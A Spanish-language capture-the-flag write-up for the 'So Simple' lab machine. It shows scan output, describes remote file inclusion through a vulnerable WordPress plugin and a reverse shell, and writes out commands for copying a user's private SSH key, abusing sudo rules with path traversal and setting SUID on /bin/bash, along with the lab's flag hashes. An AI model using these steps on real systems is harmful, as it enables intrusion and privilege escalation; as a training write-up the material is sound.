Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-19 07:20 EDT
Nmap scan report for 192.168.5.194
Host is up (0.00023s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 5b:55:43:ef:af:d0:3d:0e:63:20:7a:f4:ac:41:6a:45 (RSA)
| 256 53:f5:23:1b:e9:aa:8f:41:e2:18:c6:05:50:07:d8:d4 (ECDSA)
|_ 256 55:b7:7b:7e:0b:f5:4d:1b:df:c3:5d:a1:d7:68:a9:6b (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: So Simple
MAC Address: 00:0C:29:F5:A8:94 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.76 seconds
Gobuster
Info:
Si nos vamos a /mybackup.txt veremos lo siguiente...
Es un Base32 y decodificado quedaria algo tal que asi...
wpscan
Info:
Descubrimos 2 usuarios y tenemos una contraseña, por lo que lo probaremos en los 2 usuarios, vemos que en usuarios max sirve la contraseña que nos proporciono...
Pero poco podemos hacer ahi, si intentamos hacer un ataque de fuerza bruta a admin para la password no nos sacara nada, pero veremos que tiene un plugin vulnerable...
Info:
Vemos que tiene un plugin llamado social-warfare y si vamos a la siguiente pagina...
Con esto lo que haremos sera mirar el passwd de la maquina victima...
Ahora abrimos un servidor de python3....
Una vez abierto nos vamos a la siguiente URL...
Esto lo que hara sera coger el .txt que hemos creado nosotros para que vea ese archivo y ejecutarlo visualizando el passwd...
Por lo que vemos funciona, por lo que ahora haremos lo siguiente...
Nos haremos una Reverse Shell, antes de darle a enviar, haremos lo siguiente...
Y cuando estemos a la escucha, lo enviamos teniendo el servidor de python3 abierto donde se encuentra nuestro payload.txt...
Una vez enviado tendremos una shell con el usuario www-data...
Ahora sanitizamos la shell...
Si nos vamos a la /home del usuario max veremos un personal.txt que contiene...
Es una Base64 que dice lo siguiente...
Por lo que no sirve para nada, pero si nos fijamos podemos entrar en el .ssh/ de max y dentro estara la id_rsa privada la cual podemos leer, por lo que nos podremos conectar desde fuera con su id_rsa de la siguiente forma...
Maquina Victima
Maquina Host
Una vez la tengamos en nuestro host...
Y con esto ya seriamos el usuario max, por lo que leeremos la flag...
user.txt (flag1)
Si hacemos sudo -l veremos lo siguiente...
Podremos ejecutar como el usuario steven ese archivo, por lo que haremos lo siguiente...
o
Y con esto ya seriamos steven...
Leemos la flag...
user2.txt (flag2)
Si hacemos sudo -l veremos lo siguiente...
Podemos ejecutar ese .sh como root, pero si intentamos ir ahi no esta la carpeta ni el archivo creados, por lo que lo creamos nosotros inyectando el codigo malicioso...
Info:
Por lo que vemos funciono y si hacemos esto ya seriamos root...
# <Ctrl> + <z>
stty raw -echo; fg
reset xterm
export TERM=xterm
export SHELL=/bin/bash
# Para ver las dimensiones de nuestra consola en el Host
stty size
# Para redimensionar la consola ajustando los parametros adecuados
stty rows <ROWS> columns <COLUMNS>
SGFoYWhhaGFoYSwgaXQncyBub3QgdGhhdCBlYXN5ICEhISA=
Hahahahaha, it's not that easy !!!
python3 -m http.server
wget http://<IP_VICTIM>:8000/id_rsa
chmod 600 id_rsa
ssh -i id_rsa max@<IP>
073dafccfe902526cee753455ff1dbb0
Matching Defaults entries for max on so-simple:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User max may run the following commands on so-simple:
(steven) NOPASSWD: /usr/sbin/service
sudo -u steven /usr/sbin/service ../../bin/bash
nano shell.sh
#Dentro del nano
#!/bin/bash
/bin/bash -i
sudo -u steven /usr/sbin/service ../../tmp/shell.sh
b662b31b7d8cb9f5cdc9c2010337f9b8
Matching Defaults entries for steven on so-simple:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User steven may run the following commands on so-simple:
(root) NOPASSWD: /opt/tools/server-health.sh
mkdir /opt/tools
cd /opt/tools/
nano server-health.sh
#Dentro del nano
#!/bin/bash
chmod u+s /bin/bash
sudo /opt/tools/server-health.sh
ls -la /bin/bash
-rwsr-xr-x 1 root root 1183448 Feb 25 2020 /bin/bash